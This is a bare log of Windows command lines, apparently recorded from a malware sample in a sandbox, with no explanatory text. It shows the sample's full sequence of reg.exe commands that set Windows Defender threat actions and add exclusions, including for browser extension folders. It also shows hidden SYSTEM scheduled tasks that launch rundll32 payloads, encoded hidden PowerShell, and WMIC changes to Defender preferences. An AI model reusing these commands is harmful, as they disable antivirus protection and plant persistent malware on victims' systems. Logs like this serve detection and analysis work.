- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814523 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814523 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147849223 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147849223 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147943523 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147943523 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147941867 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147941867 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147948977 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147948977 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"%ProgramFiles(x86)%\HhaNBGcuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microso...
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\HhaNBGcuU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\HhaNBGcuU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\HhaNBGcuU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IXzVmqJFDmDU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IXzVmqJFDmDU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lJjXfKfpJVtdC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lJjXfKfpJVtdC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\tzdhLHbIjrNAUNTyxhR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\tzdhLHbIjrNAUNTyxhR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vlxHtUmyEJUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vlxHtUmyEJUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v %ALLUSERSPROFILE%\rHwmoXVaXOEgCaVB /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v %ALLUSERSPROFILE%\rHwmoXVaXOEgCaVB /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v %TEMP%\nnEaZCbtCuWmFnyZt /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v %TEMP%\nnEaZCbtCuWmFnyZt /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\MWApEFojzuXiLU /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\MWApEFojzuXiLU /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\ShsqfzqZgGGaO2 /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\ShsqfzqZgGGaO2 /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\aasozdWqwSKHqgP /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\aasozdWqwSKHqgP /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\aasozdWqwSKHqgP2 /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\aasozdWqwSKHqgP2 /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\arIazdpPSpwgyJiRw2 /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\arIazdpPSpwgyJiRw2 /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\vTGyjTpJfVtyWubCYtk2 /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v <SYSTEM32>\Tasks\vTGyjTpJfVtyWubCYtk2 /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v %WINDIR%\Temp\apVYxgZOEctSApDE /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v %WINDIR%\Temp\apVYxgZOEctSApDE /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gbFTRaKRG" /SC once /ST 00:47:07 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gbFTRaKRG"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\svchost.exe' -k LocalSystemNetworkRestricted -p -s fhsvc
- '<SYSTEM32>\svchost.exe' -k LocalSystemNetworkRestricted -s WPDBusEnum
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gbFTRaKRG"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "NzkPodfYMwfUeZgIy" /SC once /ST 00:30:25 /RU "SYSTEM" /TR "\"%WINDIR%\Temp\apVYxgZOEctSApDE\aliRXHIrylHjCgJ\SmLjxVh.exe\" Nl /qOmydidhe 452799 /S" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "NzkPodfYMwfUeZgIy"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bdFUuWXJhGRaMzPmKB"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "cmd /C if exist \"%ProgramFiles(x86)%\HhaNBGcuU\ySVfEQ.dll\" rundll32 \"%ProgramFiles(x86)%\HhaNBGcuU\ySVfEQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "aasozdWqwSKHqgP" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "aasozdWqwSKHqgP2" /F /xml "%ProgramFiles(x86)%\HhaNBGcuU\GVrPxng.xml" /RU "SYSTEM"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "aasozdWqwSKHqgP"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "aasozdWqwSKHqgP"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "MWApEFojzuXiLU" /F /xml "%ProgramFiles(x86)%\IXzVmqJFDmDU2\EOYyubj.xml" /RU "SYSTEM"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "ShsqfzqZgGGaO2" /F /xml "%ALLUSERSPROFILE%\rHwmoXVaXOEgCaVB\sLXyYbg.xml" /RU "SYSTEM"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "arIazdpPSpwgyJiRw2" /F /xml "%ProgramFiles(x86)%\tzdhLHbIjrNAUNTyxhR\lDcmemf.xml" /RU "SYSTEM"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "vTGyjTpJfVtyWubCYtk2" /F /xml "%ProgramFiles(x86)%\lJjXfKfpJVtdC\WSwApFR.xml" /RU "SYSTEM"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "YVmMShEtQAeKcGULr" /SC once /ST 00:40:19 /RU "SYSTEM" /TR "rundll32 \"%WINDIR%\Temp\apVYxgZOEctSApDE\xIZfqWzf\wMtuzxo.dll\",#1 /lLhYdidaSA 452799" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "YVmMShEtQAeKcGULr"
- '<SYSTEM32>\rundll32.exe' "%WINDIR%\Temp\apVYxgZOEctSApDE\xIZfqWzf\wMtuzxo.dll",#1 /lLhYdidaSA 452799
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "aDtuh1" /SC once /ST 00:40:51 /F /RU "user" /TR "\"%ProgramFiles%\Mozilla Firefox\firefox.exe\""
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "aDtuh1"
- '%ProgramFiles%\mozilla firefox\firefox.exe'
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "aDtuh1"
- '%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m calc.exe /c "cmd /C powershell -WindowStyle Hidden sleep 10& WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension...
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NzkPodfYMwfUeZgIy"
- '%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m calc.exe /c "cmd /C powershell -WindowStyle Hidden sleep 10& WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=T...
- '%WINDIR%\syswow64\cmd.exe' powershell -WindowStyle Hidden sleep 10& WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden sleep 10
- '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)